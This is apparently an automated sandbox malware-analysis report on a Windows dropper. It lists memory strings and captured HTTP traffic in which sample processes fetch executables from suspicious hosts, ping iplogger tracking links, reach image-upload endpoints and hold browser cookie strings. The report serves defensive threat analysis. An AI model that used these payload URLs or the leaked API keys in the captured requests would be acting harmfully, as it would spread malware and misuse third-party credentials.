                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1ntLF4
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nvRF4
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nxVH4
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nzmX4
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1pcji7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1pdxr7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1q6Jt7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1rDMq7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1rd8N6
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1rqRg7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1s4qp7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1s5qp7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1spuy7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1tAnk7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1tEnk7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1tSnk7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1tTnk7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1tUnk7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1uS4i7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1uW6i7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1vb2Q7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1vk2Q7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1vv2Q7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1vx2Q7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1x5bg7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1xWbz7
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1xvbz7
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://joinmassive.com/faq#users
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://joinmassive.com/privacy
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://joinmassive.com/terms
                Source: FagLhQ, 00000015.00000000.42703547398.0000000000401000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lgfftg.s3.eu-west-3.amazonaws.com/613jyr1
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lgfftg.s3.eu-west-3.amazonaws.com/613jyr1https://htyjh.s3.ap-south-1.amazonaws.com/613fdh2ht
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42716979665.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/files/pe/pb1105.exe
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/files/pe/pb1105.exeC/C
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/files/pe/pb1105.exeLMEM
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/files/pe/pb1105.exeN/L
                Source: Fuck.exe.pif, 00000014.00000003.42716979665.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnh.ajn322bb.com/files/pe/pb1105.exewlcUivWMjcwg
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prntscr.com/upload.php
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prntscr.com/upload.phphttps://prntscr.com/upload.php
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sm.ms/api/v2/upload?inajax=1
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sm.ms/api/v2/upload?inajax=1https://sm.ms/api/v2/upload?inajax=1
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uewrgu.s3.us-west-2.amazonaws.com/613dge3
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aol.com
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43356981109.00000000025B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/collect
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=admob&oq=admob
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.icodeps.com/
                Source: FagLhQ, 00000015.00000003.42712613293.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42708112679.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000000.42724086106.0000000000401000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.innosetup.com/
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iubenda.com/privacy-policy/216992
                Source: FagLhQ, 00000015.00000003.42712613293.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42708112679.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000000.42724086106.0000000000401000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.remobjects.com/ps
                Source: unknownDNS traffic detected: queries for: UWQEfDCLagTOQundi.UWQEfDCLagTOQundi
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDD694 InternetReadFile,SetEvent,GetLastError,SetEvent,13_2_00EDD694
                Source: global trafficHTTP traffic detected: GET /adblockfast/marketator/windows/AdblockInstaller.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.computewall.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/pe/pb1105.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mnh.ajn322bb.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /vs/17/release/vc_redist.x64.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.0Host: aka.ms
                Source: global trafficHTTP traffic detected: GET /gamexyz/3004/random.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a.dowgmea.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: b.dowgmeb.com
                Source: global trafficHTTP traffic detected: GET /search_hyperfs_213.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 2jhbdhjfsdf2.monsterConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /attachments/982710296206536716/1020079721150685314/NotGraduate.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /setup.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cf43570.tmweb.ruConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.icodeps.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /1nRWH4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /apps/config?productId=adblockfast&distId=marketator&anonId=11389406-0377-47ed-98c7-d564e683c6eb HTTP/1.1Host: api.joinmassive.comAccept: */*x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                Source: global trafficHTTP traffic detected: GET /dist/match?productId=adblockfast&distId=marketator&downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&installerSessionId=113894061664863815&pid=767&installType=installPath HTTP/1.1Host: api.joinmassive.comAccept: */*x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                Source: global trafficHTTP traffic detected: GET /adblockfast/marketator/windows/appcast.xml HTTP/1.1User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)Host: cdn.computewall.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /adblockfast/marketator/windows/appcast.xml HTTP/1.1User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)Host: cdn.computewall.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /adblockfast/marketator/windows-0.3.2/AdblockInstaller.exe HTTP/1.1User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)Host: cdn.computewall.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sdk/config?stage=prod&uid=4c6fdfc9-de78-4899-8dc6-365b9c5db799 HTTP/1.1x-api-key: 5oydibnqoD6t310DYGMUh7y4e2WWpHvvapKEL4pFConnection: CloseHost: api.joinmassive.com
                Source: global trafficHTTP traffic detected: GET /postback/adblockfast/marketator?downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&pid=767 HTTP/1.1Host: api.joinmassive.comAccept: */*
                Source: global trafficHTTP traffic detected: GET /files/Hadi.config.CfgEncFile HTTP/1.1RANGE: bytes=0-2097152User-Agent: ChromeHost: 109.206.241.33Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /down/u4vYmgIN4sqk HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mxnzvc.xyz:8888Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /3004.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
                Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
                Source: global trafficHTTP traffic detected: GET /mp3studios6/mp3studios_6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.savesucpnys.xyzConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mp3studios_6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.savesucpnys.xyzConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Oct 2022 05:10:22 GMTContent-Type: text/htmlContent-Length: 555Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 04 Oct 2022 05:10:27 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 754b69446a019b74-FRACache-Control: private, max-age=0Content-Disposition: attachmentExpires: Tue, 04 Oct 2022 05:10:27 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400X-GUploader-UploadID: ADPycdsQXrOckubcZ6GbldVwwoYNFV5hhNjZc9jk45oCQYVy5o0j8vbq6apkcMJQXezPlsMPxmT4wa9cnIYaUG3DW33JXQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze%2FJK%2BbhQ7PXwdBQuahU675YHn0dhb2FbRwk5hM9%2BgOzScCtOac9oTD7%2FFAjZtQE4fwtRBhxIw1tcd3nIRWbjq1swYrh%2BFgTFm1e%2FQ9pbiWSBsCX7z39%2BpbbL14q7QuCUueg8g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.33
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: svchost.exe, 00000026.00000003.44422916422.000001980BA11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
                Source: svchost.exe, 00000026.00000003.44422916422.000001980BA11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: tr-tr.www.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.apache.mirror.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.bankasya.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.beta.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.c.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.centos.mirror.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.cinyourrc.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.clientsidetesticici.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.com.tr.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.connect.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.cpan.mirror.facebook.net equals www.facebook.com (Facebook)
